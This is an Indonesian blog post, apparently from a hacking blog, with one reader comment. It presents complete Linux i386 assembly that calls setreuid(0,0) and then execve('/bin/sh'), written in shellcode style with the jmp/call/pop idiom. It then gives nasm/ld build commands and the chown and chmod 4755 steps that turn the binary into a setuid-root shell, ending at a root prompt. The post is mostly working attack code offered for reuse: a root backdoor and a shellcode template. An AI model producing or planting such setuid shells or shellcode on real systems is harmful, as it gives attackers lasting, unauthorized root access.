break a time, with break the c0de…

program setreuid 0,0 ~ execve('/bin/sh','','') ~ exit()


berikut adalah shell dengan setreuid 0,0 yang ditulis dalam bahasa assembly…

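; program setreuid 0,0 ~ sysexecve('/bin/sh','','') ~ exit()
; programmer gunslinger_ <yudha.gunslinger@gmail.com>
;
; Target:  Linux i386 (32-bit), raw int 0x80 system calls, no libc.
; ABI:     eax = syscall number; arguments in ebx, ecx, edx;
;          result returned in eax (negative value = -errno).
;          The kernel preserves every register except eax.
;
; Flow:    setreuid(0,0) -> execve("/bin/sh", NULL, NULL) -> exit(1)
;          exit() is only reached if execve fails; on success execve
;          replaces the process image and never returns.
;
; Note:    setreuid(0,0) only succeeds when the process already has
;          effective uid 0 or saved uid 0 (for example because the binary
;          was installed setuid root). Its return value is not checked;
;          execve is attempted regardless, so a non-root run still gets
;          a shell, just an unprivileged one.

global _start

section .text

_start:
	; --- setreuid(ruid = 0, euid = 0) ---
	; Syscall 70 is the legacy 16-bit-uid setreuid on i386; fine for uid 0.
	; Every argument register is zeroed explicitly instead of relying on the
	; kernel having zeroed the registers at ELF entry.
	xor	eax, eax
	mov	al, 70			; __NR_setreuid
	xor	ebx, ebx		; ruid = 0
	xor	ecx, ecx		; euid = 0
	int	0x80

	; jmp/call/pop idiom: `call .exec` pushes the address of the byte that
	; follows the call, i.e. the address of the '/bin/sh' string, and
	; .exec pops it into ebx. This avoids hard-coding an absolute address.
	jmp	short .load_str

.exec:
	; --- execve(path, argv = NULL, envp = NULL) ---
	pop	ebx			; ebx = address of "/bin/sh"
	xor	eax, eax		; eax still holds setreuid's return value;
	mov	al, 11			;   `mov al` only sets the low byte, so clear it first
	xor	ecx, ecx		; argv = NULL
	xor	edx, edx		; envp = NULL
	int	0x80

	; --- exit(1): only reached when execve failed ---
	xor	eax, eax
	inc	eax			; __NR_exit = 1
	xor	ebx, ebx
	inc	ebx			; status = 1 reports the failure to the parent
	int	0x80

.load_str:
	call	.exec			; pushes the address of the string below
	db	'/bin/sh', 0		; NUL-terminated: execve expects a C string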

kompile dengan

gunslinger@c0debreaker:~$ nasm -f elf shell.asm
gunslinger@c0debreaker:~$ ld -s -o shell shell.o

lalu beri suid root

gunslinger@c0debreaker:~$ sudo chown root:root shell
[sudo] password for gunslinger:
gunslinger@c0debreaker:~$ sudo chmod 4755 shell
gunslinger@c0debreaker:~$ ./shell
#

anda sudah mempunyai shell dengan akses root (suid root): bit suid membuat euid menjadi 0 saat program dijalankan, lalu setreuid(0,0) menyamakan uid real dengan euid, sehingga shell yang dipanggil lewat execve berjalan sepenuhnya sebagai root.


One response

  1. mangtabs penjelasannya ……… :D ….
    sangat jelas …thanks bnyk gan ijin sedottt .. :)

    August 24, 2010 at 5:16 pm
